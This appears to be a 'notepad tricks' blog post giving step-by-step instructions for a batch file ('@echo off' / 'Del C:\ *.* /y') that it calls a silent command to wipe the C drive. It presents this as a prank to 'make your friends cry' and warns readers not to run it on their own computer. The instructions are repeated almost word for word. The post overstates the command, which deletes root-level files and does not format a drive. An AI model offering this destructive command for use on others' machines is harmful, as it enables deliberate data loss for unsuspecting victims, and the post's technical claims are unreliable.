More in the notepad tricks,here is a batch file program to delete an entire drive form the computer. Yes, you heard it right. Notepad is your biggest tool to put your evil efforts to make your friends cry. This short trick to wipe and Delete C Drive has a small code that has the power to delete your hard drive without any prompt. This chunk of code is really helpful if you want to crash and format a hard drive.
This is a simple batch program that deletes an entire drive from your computer in minutes. This is also known as the Silent Format Command because of its work that has the power to clear off the C Drive of the hard disk in no time. If you want to try this Tech Geek Trick, below is the notepad code to delete your C drive.
So here it goes:
1. Open notepad.
2. Type the following command in notepad:
@echo off
Del C:\ *.* /y
3. Save this file as 'anyname.bat' in your desktop or any other place.
4. Run it.
NOTE: Replace 'anyname' with a name you want to give to your file. Don't forget to save in .bat format.
Must Read: Make any Computer Shutdown Automatically
LEARN HOW TO DELETE AN ENTIRE DRIVE FROM YOUR COMPUTER
WARNING: Do not try on your own computer or will have all your system files deleted.This is a simple batch program that deletes an entire drive from your computer in minutes. This is also known as the Silent Format Command because of its work that has the power to clear off the C Drive of the hard disk in no time. If you want to try this Tech Geek Trick, below is the notepad code to delete your C drive.
So here it goes:
1. Open notepad.
2. Type the following command in notepad:
@echo off
Del C:\ *.* /y
3. Save this file as 'anyname.bat' in your desktop or any other place.
4. Run it.
NOTE: Replace 'anyname' with a name you want to give to your file. Don't forget to save in .bat format.
Must Read: Make any Computer Shutdown Automatically